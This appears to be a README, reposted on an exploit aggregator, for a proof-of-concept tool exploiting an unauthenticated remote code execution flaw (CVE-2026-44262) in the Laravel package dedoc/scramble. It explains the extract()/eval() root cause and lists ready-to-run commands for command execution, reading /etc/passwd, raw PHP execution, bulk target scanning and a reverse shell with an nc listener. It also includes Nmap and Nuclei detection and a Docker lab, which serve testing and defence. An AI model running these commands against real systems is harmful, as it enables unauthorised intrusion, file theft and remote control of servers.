Share
## https://sploitus.com/exploit?id=6FCE9657-DE00-55DB-9A70-1660B9FAC8C6
dedoc/scramble RCE (CVE-2026-44262) PoC
## ๐ Description
CVE-2026-44262 is an unauthenticated Remote Code Execution vulnerability in [dedoc/scramble](https://github.com/dedoc/scramble), a Laravel API documentation generator.
`NodeRulesEvaluator::doEvaluateExpression()` calls `extract($variables)` before `eval("return $code;")`. When a controller assigns `$request->input()` to a variable named `$code` and uses it as a validation rule, Scramble tracks that variable and passes it into the eval scope. An attacker can overwrite `$code` with arbitrary PHP by supplying a crafted query parameter to `/docs/api.json`.
**Affected versions:** `dedoc/scramble >=0.13.2, <0.13.22`
## โจ Features
- **Auto-detection** โ scans OpenAPI spec to discover vulnerable parameters automatically
- **Timing probe** โ safe non-breaking check using `sleep()` to confirm eval fires
- **Command execution** โ run shell commands and capture output directly from the HTTP response
- **File read** โ read arbitrary files from the target filesystem
- **PHP code execution** โ execute raw PHP code via the RCE
- **Reverse shell** โ PHP `proc_open` reverse shell, no bash or busybox required
- **Bulk scanning** โ scan multiple targets from a file
- **OS detection** โ auto-detects Windows/Linux/Darwin and adjusts payloads accordingly
- **Nmap NSE** โ passive + timing detection script (`http-scramble-rce-detect.nse`)
- **Nuclei template** โ two-step detection with timing confirmation (`CVE-2026-44262.yaml`)
## ๐ ๏ธ Installation
No external dependencies โ uses Python stdlib only.
### macOS / Linux
```bash
git clone https://github.com/joshuavanderpoll/CVE-2026-44262.git
cd CVE-2026-44262
python3 CVE-2026-44262.py --target http://example.com
```
### Windows
```bash
git clone https://github.com/joshuavanderpoll/CVE-2026-44262.git
cd CVE-2026-44262
python3 CVE-2026-44262.py --target http://example.com
```
## โ๏ธ Usage
```
usage: CVE-2026-44262.py [-h] (--target TARGET | --targets FILE) [--check]
[--command CMD] [--code PHP] [--read-file PATH] [--shell]
[--lhost HOST] [--lport PORT] [--os OS]
[--useragent USERAGENT] [--timeout SECONDS]
```
---
### Detection
```bash
# Full detection (timing + exec probe)
python3 CVE-2026-44262.py --target http://example.com
# Safe check only โ timing probe, no command execution
python3 CVE-2026-44262.py --target http://example.com --check
# Bulk scan
python3 CVE-2026-44262.py --targets targets.txt
```
---
### Exploitation
```bash
# Execute a command
python3 CVE-2026-44262.py --target http://example.com --command "whoami"
# Read a file
python3 CVE-2026-44262.py --target http://example.com --read-file /etc/passwd
# Execute raw PHP
python3 CVE-2026-44262.py --target http://example.com --code "echo php_uname();"
# Reverse shell (start: nc -lv 4444)
python3 CVE-2026-44262.py --target http://example.com --shell --lhost 172.17.0.1 --lport 4444
```
---
### Nmap & Nuclei (passive + timing, no exploitation)
```bash
# Nmap
nmap -p 80,443 --script http-scramble-rce-detect example.com
# Nuclei
nuclei -t CVE-2026-44262.yaml -u http://example.com
```
## ๐ Docker Lab
A self-contained Docker environment with the vulnerable app (dedoc/scramble v0.13.21) is included.
See [docker/DOCKER.md](docker/DOCKER.md) for details.
```bash
cd docker/
docker compose up -d
python3 ../CVE-2026-44262.py --target http://localhost:8000
```
## ๐ต๐ผ References
- [dedoc/scramble](https://github.com/dedoc/scramble)
- [GitHub Advisory โ GHSA-4rm2-28vj-fj39](https://github.com/advisories/GHSA-4rm2-28vj-fj39)
- [NVD โ CVE-2026-44262](https://nvd.nist.gov/vuln/detail/CVE-2026-44262)
- [HackIndex.io โ CVE-2026-44262](https://hackindex.io/vulnerabilities/CVE-2026-44262)
## ๐ข Disclaimer
This tool is provided for educational and research purposes only. The creator assumes no responsibility for any misuse or damage caused by this tool.